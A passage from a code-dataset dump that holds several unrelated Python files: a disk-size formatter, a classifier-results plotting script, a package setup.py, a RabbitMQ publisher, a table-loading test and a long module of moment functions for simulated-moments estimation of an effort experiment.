into the appropriate human\n readable unit with a relevant suffix.\n \"\"\"\n for unit in ['','K','M','G','T','P','E','Z']:\n if abs(bytes) < 1024.0:\n return f'{bytes:3.1f} {unit}{suffix}'\n bytes /= 1024.0\n return f'{bytes:.1f} {\"Y\"}{suffix}'\n\ndef ints_to_human_readable(disk: dict) -> dict:\n \"\"\"\n Converts the dictionary of integers\n into the human readable strings.\n \"\"\"\n result = {}\n try:\n for key in disk:\n result[key] = bytes_to_human_readable(disk[key])\n except:\n result[key] = disk[key]\n return result\n\ndef printml(folder: list, cols: int = 1) -> None:\n \"\"\"Prints multiline strings side by side.\"\"\"\n size = len(folder)\n incr = ceil(size / cols)\n end, start = 0, 0\n while True:\n if end >= size:\n break\n end += incr\n # Check if the end index exceeds the last index\n if end > size:\n end = size\n lines = [folder[i].splitlines() for i in range(start, end)]\n for line in zip(*lines):\n print(*line, sep=' ')\n print()\n start = end","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634601221","text":"import mysql.connector\nimport numpy as np\nimport matplotlib.pyplot as plt \n\nsql = \"\"\"select \n\tdiseaseName,\n\tscore,\n\t(select featureselectionname from classifierresults where macrof1score = score limit 1) as featureName\nfrom (\nselect\n\tdiseaseName,\n\tmax(MacroF1Score) as score\nfrom classifierresults\nwhere source is null\ngroup by diseasename\nunion\nselect\n\tdiseaseName,\n\tMacroF1Score as score\nfrom classifierresults\nwhere source is null \nand FeatureSelectionName = 'mallet custom count baseline'\n) b\norder by DiseaseName asc, featureName asc\n\"\"\"\n\nfeatureNameHash = {\n\t\"mallet custom count baseline\":\"bl\",\n\t\"subjectiveComplexFeature\":\"sc\",\n\t\"subjectiveDiseaseUniqueFeature\":\"sdu\",\n\t\"subjectiveSimpleFeature\":\"ss\",\n\t\"subjectiveWordComplexFeature\":\"swc\",\n\t\"highestProbFeature\":\"hp\"\n}\n\ndef get(connection):\n\tcursor = connection.cursor(buffered=True)\n\n\tX = []\n\tY = []\n\n\tcursor.execute(sql)\n\n\tfor row in cursor:\n\t\tdiseaseName = row[0]\n\t\tscore = float(row[1])\n\t\tfeatureName = row[2]\n\n\t\tX.append(\"%s %s\" % (diseaseName, featureNameHash[featureName]))\n\t\tY.append(score)\n\n\tfig = plt.figure()\n\n\twidth = .99\n\tind = np.arange(len(Y))\n\tplt.bar(ind, Y)\n\tplt.xticks(ind + width / 2, X)\n\tfig.autofmt_xdate()\n\n\tplt.savefig(\"results.pdf\")","sub_path":"source/loading/graphPlot.py","file_name":"graphPlot.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227138723","text":"from setuptools import setup\nfrom codecs import open\nfrom os import path\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='pycsvdb',\n version='2.3',\n description='Reading CSV file and insert into database',\n long_description=long_description,\n url='https://github.com/sajeeshe/python-csv-easy',\n author='Sajeesh E Namboothiri',\n author_email='sajeeshe@gmail.com',\n license='MIT',\n packages=['pycsvdb'],\n keywords='CSV database pandas',\n zip_safe=False)\n","sub_path":"pypi_install_script/pycsvdb-2.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260142111","text":"#!/usr/bin/env python\nimport pika\n#发布者\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='172.16.8.47'))\nchannel = connection.channel() #生成管道\n\nchannel.exchange_declare(exchange='direct_name',type='direct')#type='direct'指定关键字发送\n\nmessage = \"Hello World!\"\n\nchannel.basic_publish(exchange='direct_name',#指定exchange,消息发给exchange,exchange发送给绑定了它的队列\n routing_key='lisi',#指定关键字\n body=message)\nprint(\"Sent %r\" % message)\nconnection.close()\n","sub_path":"day_10/rabbitmq_a/rabbitmq_send.py","file_name":"rabbitmq_send.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238382024","text":"# encoding: utf-8\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <gogogo.vm@gmail.com>\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\n\nimport pytest\nfrom simplesqlite import SimpleSQLite\n\nimport pytablereader as ptr\nimport pytablewriter as ptw\n\n\nclass Test_SimpleSQLite_create_table_from_tabledata:\n\n @pytest.mark.parametrize([\"filename\"], [\n [\"python - Wiktionary.html\"],\n ])\n def test_smoke(self, tmpdir, filename):\n p = tmpdir.join(\"tmp.db\")\n con = SimpleSQLite(str(p), \"w\")\n\n test_data_file_path = os.path.join(\n os.path.dirname(__file__), \"data\", filename)\n loader = ptr.TableFileLoader(test_data_file_path)\n\n success_count = 0\n\n for tabledata in loader.load():\n if tabledata.is_empty():\n continue\n\n print(ptw.dump_tabledata(tabledata))\n\n try:\n con.create_table_from_tabledata(\n ptr.SQLiteTableDataSanitizer(tabledata).sanitize())\n success_count += 1\n except ValueError as e:\n print(e)\n\n con.commit()\n\n assert success_count > 0\n","sub_path":"test/test_from_file.py","file_name":"test_from_file.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332609984","text":"\"\"\"Functions for use in the Method of Simulated Moments.\"\"\"\nimport numpy as np\nimport pandas as pd\nimport respy as rp\nfrom linearmodels.panel import PanelOLS\n\nfrom auxiliary.helper import *\n\n\ndef params_description(return_descriptives=False, return_toyestimates=False):\n \"\"\"Provides the relevant unknown parameters and trial values.\n\n The trial values are computed as the mean of the upper and the lower bound which are also reported.\n\n Returns\n ---------------\n return_descriptives=False(default):\n Returns Pandas DataFrame with values and bounds of the parameters\n\n return_descriptives=True:\n Returns Pandas DataFrame with comments regarding the parameter\n \"\"\"\n data = {\n \"category\": [\n \"lambda\",\n \"lambda\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n ],\n \"name\": [\n \"lambda\",\n \"std_lambda\",\n \"phi_pi\",\n \"varphi_pi\",\n \"phi_mu\",\n \"varphi_mu\",\n \"kappa\",\n \"b\",\n \"delta_2\",\n \"delta_3\",\n \"delta_4\",\n \"delta_5\",\n \"delta_6\",\n \"delta_7\",\n \"delta_8\",\n \"delta_9\",\n \"delta_10\",\n ],\n \"comment\": [\n \"strength of disappointment aversion on average\",\n \"standard deviation of strength of disappointment aversion\",\n \"unobserved differences in cost of effort functions that vary over rounds and individuals\",\n \"unobserved differences in cost of effort functions that vary over rounds and individuals\",\n \"unobserved differences in cost of effort functions between individuals, constant over rounds\",\n \"unobserved differences in cost of effort functions between individuals, constant over rounds\",\n \"common cost parameter\",\n \"common cost parameter\",\n \"round effects for round 2\",\n \"round effects for round 3\",\n \"round effects for round 4\",\n \"round effects for round 5\",\n \"round effects for round 6\",\n \"round effects for round 7\",\n \"round effects for round 8\",\n \"round effects for round 9\",\n \"round effects for round 10\",\n ],\n \"lower\": [1, 0.5, 0, 0.2, 0, 0.2, 1, -35, -1, -1, -1, -1, -1, -1, -1, -1, -1],\n \"upper\": [3, 2.5, 0.7, 1.5, 0.7, 1.5, 2.5, -20, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n }\n df = pd.DataFrame(data, columns=[\"category\", \"name\", \"comment\", \"lower\", \"upper\"])\n df.set_index([\"category\", \"name\"], inplace=True)\n if return_toyestimates == True:\n df['value'] = [1.5,\n 1.823,\n 0.035,\n 0.085,\n 0.035,\n 0.085,\n 0.5,\n -25,\n 0,\n -0.1,\n -0.2,\n -0.2,\n -0.2,\n -0.2,\n -0.3,\n -0.3,\n -0.4]\n else:\n df[\"value\"] = (df[\"upper\"] + df[\"lower\"]) / 2\n for i in range(8, 17):\n df.iloc[i, 3] = 0\n if return_descriptives == True:\n df = df[[\"value\", \"comment\", \"lower\", \"upper\"]]\n else:\n df = df[[\"value\", \"lower\", \"upper\"]]\n return df\n\n\ndef moments_description():\n \"\"\"Describes Moments.\"\"\"\n data = {\n \"name\": [\n \"effort_std\",\n \"autocorrelation_l1\",\n \"autocorrelation_l2\",\n \"round_change_std\",\n \"period_average\",\n \"cond_corr_e2_prize\",\n \"cond_corr_e2_e1\",\n \"cond_corr_e2_e1timesprize\",\n \"j_perc_cond_corr_e2_prize\",\n \"j_perc_cond_corr_e2_e1\",\n \"j_perc_cond_corr_e2_e1timesprize\",\n \"low_effort_low_prize\",\n \"low_effort_high_prize\",\n \"high_effort_low_prize\",\n \"high_effort_high_prize\",\n \"low_effort_prop\",\n \"high_effort_prop\",\n ],\n \"comment\": [\n \"standard deviation of effort\",\n \"autocorrelation with lag 1\",\n \"autocorrelation with lag 2\",\n \"standard deviation of round-round change of effort\",\n \"average effort in period i\",\n \"correlation of e2 and prize, conditional on control effects\",\n \"correlation of e2 and e1, conditional on control effects\",\n \"correlation of e2 and e1 * prize, conditional on control effects\",\n \"jth percentile of cond. correlation e1 and prize of specific effects\",\n \"jth percentile of cond. correlation e1 and e2 of specific effects\",\n \"jth percentile of cond. correlation e2 and e1 * prize of specific effects\",\n \"effort conditional on low e1 and low prizes\",\n \"effort conditional on low e1 and high prizes\",\n \"effort conditional on high e1 and low prizes\",\n \"effort conditional on high e1 and high prizes\",\n \"probability of low effort\",\n \"probability of high effort\"\n ],\n }\n\n df = pd.DataFrame(data, columns=[\"name\", \"comment\"])\n df.set_index([\"name\"], inplace=True)\n return df\n\n\ndef replace_nans(df):\n \"\"\"Replace missing values in data.\"\"\"\n return df.fillna(0)\n\n\ndef effort_std(df):\n \"\"\"Standard deviation of the effort.\"\"\"\n return df[\"e2\"].std()\n\n\ndef df_autocorr(df, lag=1, axis=0):\n \"\"\"Compute full-sample column-wise autocorrelation for a DataFrame.\"\"\"\n return df.apply(lambda col: col.autocorr(lag), axis=axis)\n\n\ndef calc_autocorrelation_lag1(df):\n \"\"\"Compute average autocorrelation with specified lag.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n return corr_rounds.apply(lambda col: col.autocorr(1), axis=0).mean()\n\n\ndef pooled_autocorr_lag1(df):\n \"\"\"Compute the pooled autocorrelation with lag 1.\"\"\"\n ds = df.query(\"period > 1\")[\"e2\"]\n ds.reset_index(drop=True, inplace=True)\n ds_lag = df.query(\"period < 10\")[\"e2\"]\n ds_lag.reset_index(drop=True, inplace=True)\n return ds.corr(ds_lag)\n\n\ndef pooled_autocorr_lag2(df):\n \"\"\"Compute the pooled autocorrelation with lag 2.\"\"\"\n ds = df.query(\"period > 2\")[\"e2\"]\n ds.reset_index(drop=True, inplace=True)\n ds_lag = df.query(\"period < 9\")[\"e2\"]\n ds_lag.reset_index(drop=True, inplace=True)\n return ds.corr(ds_lag)\n\n\ndef calc_autocorrelation_lag2(df):\n \"\"\"Compute average autocorrelation with specified lag.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n return corr_rounds.apply(lambda col: col.autocorr(2), axis=0).mean()\n\n\ndef round_change_std(df):\n \"\"\"Compute standard deviation of round to round change.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n round_changes = list()\n for sub in corr_rounds.columns:\n for i in corr_rounds.index:\n if i < 10:\n round_changes.append(corr_rounds[sub][i + 1] - corr_rounds[sub][i])\n else:\n break\n rc = pd.Series(round_changes)\n return rc.std()\n\n\ndef period1_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {1}\")[\"e2\"].mean()\n\n\ndef period2_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {2}\")[\"e2\"].mean()\n\n\ndef period3_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {3}\")[\"e2\"].mean()\n\n\ndef period4_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {4}\")[\"e2\"].mean()\n\n\ndef period5_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {5}\")[\"e2\"].mean()\n\n\ndef period6_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {6}\")[\"e2\"].mean()\n\n\ndef period7_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {7}\")[\"e2\"].mean()\n\n\ndef period8_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {8}\")[\"e2\"].mean()\n\n\ndef period9_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {9}\")[\"e2\"].mean()\n\n\ndef period10_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {10}\")[\"e2\"].mean()\n\n\ndef cond_corr_e2_prize(df):\n \"\"\"Correlation of e2 and the prize after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"prize_resid\"])\n for label in [\"e2\", \"prize\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~e1+e1timesprize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"prize_resid\"])\n\n\ndef cond_corr_e2_e1(df):\n \"\"\"Correlation of e2 and the e1 after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1_resid\"])\n for label in [\"e2\", \"e1\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~prize+e1timesprize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"e1_resid\"])\n\n\ndef cond_corr_e2_e1timesprize(df):\n \"\"\"Correlation of e2 and the interaction of e1 and prize after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1timesprize_resid\"])\n for label in [\"e2\", \"e1timesprize\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~e1+prize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"e1timesprize_resid\"])\n\n\ndef perc17_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.5, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef perc17_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.50, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef perc17_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.5, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef low_effort_low_prize(df):\n return df.query(\"e1 <= 23 & prize <= 1.33\")[\"e2\"].mean()\n\n\ndef low_effort_high_prize(df):\n return df.query(\"e1 <= 23 & prize >= 2.55\")[\"e2\"].mean()\n\n\ndef high_effort_low_prize(df):\n return df.query(\"e1 >= 28 & prize <= 1.33\")[\"e2\"].mean()\n\n\ndef high_effort_high_prize(df):\n return df.query(\"e1 >= 28 & prize >= 2.55\")[\"e2\"].mean()\n\n\ndef low_effort_prop(df):\n return df.query(\"e2 < 15\")[\"e2\"].count() / df[\"e2\"].count()\n\n\ndef high_effort_prop(df):\n return df.query(\"e2 > 35\")[\"e2\"].count() / df[\"e2\"].count()\n\n\ndef old_percentile_correlation(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1_resid\"], index=df.index)\n for label in [\"e2\", \"e1\"]:\n column, formula = f\"{label}_resid\", f\"{label}~prize+e1timesprize+TimeEffects\"\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n dfs = dict()\n for sub in df_resid.index.get_level_values('subject').unique():\n dfs[f\"{sub}\"] = df_resid.query(f\"subject == {sub}\")\n cond_corr = list()\n for key in dfs:\n cond_corr.append(dfs[key][\"e2_resid\"].corr(dfs[key][\"e1_resid\"]))\n return np.percentile(cond_corr, 66)\n\n\ncalc_moments = {\n \"effort_std\": effort_std,\n \"corr_round_lag1\": pooled_autocorr_lag1,\n \"corr_round_lag2\": pooled_autocorr_lag2,\n \"round_change_std\": round_change_std,\n \"mean_period_1\": period1_average,\n \"mean_period_2\": period2_average,\n \"mean_period_3\": period3_average,\n \"mean_period_4\": period4_average,\n \"mean_period_5\": period5_average,\n \"mean_period_6\": period6_average,\n \"mean_period_7\": period7_average,\n \"mean_period_8\": period8_average,\n \"mean_period_9\": period9_average,\n \"mean_period_10\": period10_average,\n \"cond_corr_e2_prize\": cond_corr_e2_prize,\n \"cond_corr_e2_e1\": cond_corr_e2_e1,\n \"cond_corr_e2_e1timesprize\": cond_corr_e2_e1timesprize,\n \"perc17_cond_corr_e2_prize\": perc17_cond_corr_e2_prize,\n \"perc33_cond_corr_e2_prize\": perc33_cond_corr_e2_prize,\n \"perc50_cond_corr_e2_prize\": perc50_cond_corr_e2_prize,\n \"perc66_cond_corr_e2_prize\": perc66_cond_corr_e2_prize,\n \"perc83_cond_corr_e2_prize\": perc83_cond_corr_e2_prize,\n \"perc17_cond_corr_e2_e1\": perc17_cond_corr_e2_e1,\n \"perc33_cond_corr_e2_e1\": perc33_cond_corr_e2_e1,\n \"perc50_cond_corr_e2_e1\": perc50_cond_corr_e2_e1,\n \"perc66_cond_corr_e2_e1\": perc66_cond_corr_e2_e1,\n \"perc83_cond_corr_e2_e1\": perc83_cond_corr_e2_e1,\n \"perc17_cond_corr_e2_e1timesprize\": perc17_cond_corr_e2_e1timesprize,\n \"perc33_cond_corr_e2_e1timesprize\": perc33_cond_corr_e2_e1timesprize,\n \"perc50_cond_corr_e2_e1timesprize\": perc50_cond_corr_e2_e1timesprize,\n \"perc66_cond_corr_e2_e1timesprize\": perc66_cond_corr_e2_e1timesprize,\n \"perc83_cond_corr_e2_e1timesprize\": perc83_cond_corr_e2_e1timesprize,\n \"low_effort_low_prize\": low_effort_low_prize,\n \"low_effort_high_prize\": low_effort_high_prize,\n \"high_effort_low_prize\": high_effort_low_prize,\n \"high_effort_high_prize\": high_effort_high_prize,\n \"low_effort_prop\": low_effort_prop,\n \"high_effort_prop\": high_effort_prop,\n}\n\n\ndef observed_moments(df):\n \"\"\"Compute the observed moments.\"\"\"\n observed_moments = {\n \"effort_std\": calc_moments[\"effort_std\"](df),\n \"corr_round_lag1\": calc_moments[\"corr_round_lag1\"](df),\n \"corr_round_lag2\": calc_moments[\"corr_round_lag2\"](df),\n \"round_change_std\": calc_moments[\"round_change_std\"](df),\n \"mean_period_1\": calc_moments[\"mean_period_1\"](df),\n \"mean_period_2\": calc_moments[\"mean_period_2\"](df),\n \"mean_period_3\": calc_moments[\"mean_period_3\"](df),\n \"mean_period_4\": calc_moments[\"mean_period_4\"](df),\n \"mean_period_5\": calc_moments[\"mean_period_5\"](df),\n \"mean_period_6\": calc_moments[\"mean_period_6\"](df),\n \"mean_period_7\": calc_moments[\"mean_period_7\"](df),\n \"mean_period_8\": calc_moments[\"mean_period_8\"](df),\n \"mean_period_9\": calc_moments[\"mean_period_9\"](df),\n \"mean_period_10\": calc_moments[\"mean_period_10\"](df),\n \"cond_corr_e2_prize\": calc_moments[\"cond_corr_e2_prize\"](df),\n \"cond_corr_e2_e1\": calc_moments[\"cond_corr_e2_e1\"](df),\n \"cond_corr_e2_e1timesprize\": calc_moments[\"cond_corr_e2_e1timesprize\"](df),\n \"perc17_cond_corr_e2_prize\": calc_moments[\"perc17_cond_corr_e2_prize\"](df),\n \"perc33_cond_corr_e2_prize\": calc_moments[\"perc33_cond_corr_e2_prize\"](df),\n \"perc50_cond_corr_e2_prize\": calc_moments[\"perc50_cond_corr_e2_prize\"](df),\n \"perc66_cond_corr_e2_prize\": calc_moments[\"perc66_cond_corr_e2_prize\"](df),\n \"perc83_cond_corr_e2_prize\": calc_moments[\"perc83_cond_corr_e2_prize\"](df),\n \"perc17_cond_corr_e2_e1\": calc_moments[\"perc17_cond_corr_e2_e1\"](df),\n \"perc33_cond_corr_e2_e1\": calc_moments[\"perc33_cond_corr_e2_e1\"](df),\n \"perc50_cond_corr_e2_e1\": calc_moments[\"perc50_cond_corr_e2_e1\"](df),\n \"perc66_cond_corr_e2_e1\": calc_moments[\"perc66_cond_corr_e2_e1\"](df),\n \"perc83_cond_corr_e2_e1\": calc_moments[\"perc83_cond_corr_e2_e1\"](df),\n \"perc17_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc17_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc33_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc33_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc50_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc50_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc66_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc66_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc83_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc83_cond_corr_e2_e1timesprize\"\n ](df),\n \"low_effort_low_prize\": calc_moments[\"low_effort_low_prize\"](df),\n \"low_effort_high_prize\": calc_moments[\"low_effort_high_prize\"](df),\n \"high_effort_low_prize\": calc_moments[\"high_effort_low_prize\"](df),\n \"high_effort_high_prize\": calc_moments[\"high_effort_high_prize\"](df),\n \"low_effort_prop\": calc_moments[\"low_effort_prop\"](df),\n \"high_effort_prop\": calc_moments[\"high_effort_prop\"](df),\n }\n return observed_moments\n\n\n\n\ndef get_weighting_matrix(\n data,\n empirical_moments,\n calc_moments,\n n_bootstrap_samples,\n n_observations_per_sample,\n replace_missing_variances=None,\n):\n \"\"\" Computes a diagonal weighting matrix for estimation with msm. Weights are the\n inverse 